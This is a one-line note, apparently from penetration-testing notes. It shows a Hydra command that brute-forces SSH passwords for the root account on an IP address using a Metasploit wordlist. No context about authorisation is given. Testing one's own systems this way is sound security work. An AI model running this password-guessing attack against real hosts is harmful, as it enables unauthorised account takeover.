Basic run:

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh ://192.167.57.134:22 -t 4 -V